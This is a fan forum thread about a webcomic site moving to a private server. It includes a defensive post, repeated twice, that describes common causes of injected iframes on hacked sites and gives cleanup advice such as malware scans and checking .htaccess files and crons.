Change Your Bookmarks
Moderator: Moderators
Change Your Bookmarks
Edit: Alright, we're finally back on the home domain, now located on the private server.
I hope everything is working. There may be some problems I have to work out yet.
I hope everything is working. There may be some problems I have to work out yet.
-
- The Inkwell Coyote
- Posts: 9458
- Joined: Wed Aug 09, 2006 9:28 pm
Re: Change Your Bookmarks
Will the forums be getting moved as well, or do you plan to just update the link on the main page?
Re: Change Your Bookmarks
Once the domain is transferred, I may have to play a little musical chairs to keep the forums up. I'll try to transfer the forums to the domain once it's settled so there isn't as much down-time.
Re: Change Your Bookmarks
Good luck man, and i'll be sure to fix my bookmarks ASAP. (don't let that stop you though)
Re: Change Your Bookmarks
the redirecting after using the old url isn't working anymore, so it's time for a change of bookmarks.
[under construction]
Re: Change Your Bookmarks
Yeh I had to change my bookmark cause I procrastinated too much
-
- Grand Templar
- Posts: 1142
- Joined: Sat Dec 20, 2008 2:36 pm
- Location: Lost in the Internet....
Re: Change Your Bookmarks
Well as soon as 2kinds.com switches to the private server we wont have to worry about virus problems as much, and the website should run faster. Good luck with the move and all, Tom. Maybe after the move is over you'll have more time to work on the book.
Re: Change Your Bookmarks
I hope this helps keep Tom focused on new comics rather than server related troubleshooting.
We've seen these same types of "attacks" from time to time and they always seem to use one of a handful of ways to modify the pages with the iframes or inject malicious .htaccess content. I will list the most common below, but there may be others.
1) dl() with mod_php
The http://php.net/manual/en/function.dl.php PHP dl() function allows PHP to load extensions such as Ioncube or Zend dynamically where needed instead of simply installing them globally where they will be loaded on mod_php startup. The code is designed to unload the extension after the process is complete, but certain versions of PHP had bugs which allowed malicious attackers to load the extension in a way where it would modify the processed PHP content of all accounts on a server with an iframe at random times. This is one of the rare occasions where it is a global bug rather than strictly a user level bug where only a single account is affected.
This was solved by disabling the dl() function, switching to phpsuexec (PHP as a CGI), or by using modules such as suhosin from http://www.hardened-php.net/.
This attack is rare because it relies on access to the server, vulnerable PHP/Apache versions, and slow administrator response.
2) Virus with FTP password.
The most common method we've seen used in cases like this is a virus simply infecting a workstation with access to the passwords, logging into cPanel/FTP/Webdav using passwords stored on the machine, and uploading modified pages. These viruses are more advanced than one would think and their authors try to take advantage of every method of infection possible.
I always suggest a scan with at least two different antivirus engines (Free examples at http://www.avast.com/ http://pack.google.com/ and http://housecall.trendmicro.com/), several malware scanners (Spy-bot from http://www.safer-networking.org/en/home/index.html Ad-aware from http://download.cnet.com/Ad-Aware-Anniv ... 45910.html or Malwarebytes from http://download.cnet.com/Malwarebytes-A ... 04572.html). The Google Pack from http://pack.google.com/ also offers Spyware Doctor Starter Edition which offers another scanner to use.
These measures might seem excessive, but we've seen client sites hacked repeatedly after changing passwords to 30+ characters on BSD based servers knowing the servers were 100% secure. After scanning with multiple tools the infection was finally found and removed from the client's workstation. The hacking stopped after that. :)
3) Vulnerabilities in installed software.
There are sometimes problems with the software installed onto a website which allows code injection into writable documents such as index pages.
This is easily prevented by keeping software such as phpBB up to date and checking for vulnerabilities in custom software on the site that may allow such injections. mod_security can help find and block these types of vulnerabilities.
--
Cleaning up after this type of hack can be bothersome. The easiest way is to upload a completely new backup of all site content before the hack took place. If that is not an option then scan the website contents with ClamAV (it detects a wide variety of different types of malware), run a grep for iframes and javascript to manually check for any additional nastiness, check .htaccess files for any injected content (this is more common than you think), and check crons for any injections that may allow for reinjection.
Note: It isn't common for the server itself to be rooted (hacked) when this occurs. This is most commonly an account level/user level problem rather than a global security breach on the entire server.
We've seen these same types of "attacks" from time to time and they always seem to use one of a handful of ways to modify the pages with the iframes or inject malicious .htaccess content. I will list the most common below, but there may be others.
1) dl() with mod_php
The http://php.net/manual/en/function.dl.php PHP dl() function allows PHP to load extensions such as Ioncube or Zend dynamically where needed instead of simply installing them globally where they will be loaded on mod_php startup. The code is designed to unload the extension after the process is complete, but certain versions of PHP had bugs which allowed malicious attackers to load the extension in a way where it would modify the processed PHP content of all accounts on a server with an iframe at random times. This is one of the rare occasions where it is a global bug rather than strictly a user level bug where only a single account is affected.
This was solved by disabling the dl() function, switching to phpsuexec (PHP as a CGI), or by using modules such as suhosin from http://www.hardened-php.net/.
This attack is rare because it relies on access to the server, vulnerable PHP/Apache versions, and slow administrator response.
2) Virus with FTP password.
The most common method we've seen used in cases like this is a virus simply infecting a workstation with access to the passwords, logging into cPanel/FTP/Webdav using passwords stored on the machine, and uploading modified pages. These viruses are more advanced than one would think and their authors try to take advantage of every method of infection possible.
I always suggest a scan with at least two different antivirus engines (Free examples at http://www.avast.com/ http://pack.google.com/ and http://housecall.trendmicro.com/), several malware scanners (Spy-bot from http://www.safer-networking.org/en/home/index.html Ad-aware from http://download.cnet.com/Ad-Aware-Anniv ... 45910.html or Malwarebytes from http://download.cnet.com/Malwarebytes-A ... 04572.html). The Google Pack from http://pack.google.com/ also offers Spyware Doctor Starter Edition which offers another scanner to use.
These measures might seem excessive, but we've seen client sites hacked repeatedly after changing passwords to 30+ characters on BSD based servers knowing the servers were 100% secure. After scanning with multiple tools the infection was finally found and removed from the client's workstation. The hacking stopped after that. :)
3) Vulnerabilities in installed software.
There are sometimes problems with the software installed onto a website which allows code injection into writable documents such as index pages.
This is easily prevented by keeping software such as phpBB up to date and checking for vulnerabilities in custom software on the site that may allow such injections. mod_security can help find and block these types of vulnerabilities.
--
Cleaning up after this type of hack can be bothersome. The easiest way is to upload a completely new backup of all site content before the hack took place. If that is not an option then scan the website contents with ClamAV (it detects a wide variety of different types of malware), run a grep for iframes and javascript to manually check for any additional nastiness, check .htaccess files for any injected content (this is more common than you think), and check crons for any injections that may allow for reinjection.
Note: It isn't common for the server itself to be rooted (hacked) when this occurs. This is most commonly an account level/user level problem rather than a global security breach on the entire server.
Re: Change Your Bookmarks
So, private server now, hu? Nice
...God, so many problems. Kudos to Tom for handling 'em all.
Interesting...LinKinds up there has no posts...right next to his post. another case of the lost posts it seems
...God, so many problems. Kudos to Tom for handling 'em all.
Interesting...LinKinds up there has no posts...right next to his post. another case of the lost posts it seems
-
- The Inkwell Coyote
- Posts: 9458
- Joined: Wed Aug 09, 2006 9:28 pm
Re: Change Your Bookmarks
Looks like the server swap is finished, or at least a part of it is finished! Nice and fast, the way I like it. Thanks Tom!
Re: Change Your Bookmarks
...aaaaaand there we go again!
thanks, tom! it went smoother and quicker than i had presumed.
thanks, tom! it went smoother and quicker than i had presumed.
Re: Change Your Bookmarks
I wouldn't be so sure that it is fully switched over yet.
It looks like the 2kinds.com domain has been switched over to a dedicated solution (bare metal or virtualized) at 1and1, but it doesn't look like the website is fully running on the new server yet.
http://whois.domaintools.com/2kinds.com vs. http://whois.domaintools.com/twokindscomic.com
I tried to visit the site once when twokindscomic.com was redirected to 2kinds.com on the new server, but it was so slow that it was virtually unusable. It looks like the new server isn't optimized to handle all the traffic the website gets or doesn't have enough resources to handle it.
It looks like the 2kinds.com domain has been switched over to a dedicated solution (bare metal or virtualized) at 1and1, but it doesn't look like the website is fully running on the new server yet.
http://whois.domaintools.com/2kinds.com vs. http://whois.domaintools.com/twokindscomic.com
I tried to visit the site once when twokindscomic.com was redirected to 2kinds.com on the new server, but it was so slow that it was virtually unusable. It looks like the new server isn't optimized to handle all the traffic the website gets or doesn't have enough resources to handle it.
- Raphael
- Templar Inner Circle
- Posts: 4811
- Joined: Wed Apr 23, 2008 11:41 pm
- Location: behind you, with a blade at your throat
- Contact:
Re: Change Your Bookmarks
Could Tom or one of the mods check the forum coding or something for bugs? Extorio's virus protection system seems to be blocking him from entering the forum.
- Chi-Yu
- New Citizen
- Posts: 43
- Joined: Fri Mar 13, 2009 7:35 pm
- Location: Germany
- Fav. Twokinds Character: Natani
Re: Change Your Bookmarks
"Dlemon: Well as soon as 2kinds.com switches to the private server [...] the website should run faster."
Something makes me think that something went wrong.
Something makes me think that something went wrong.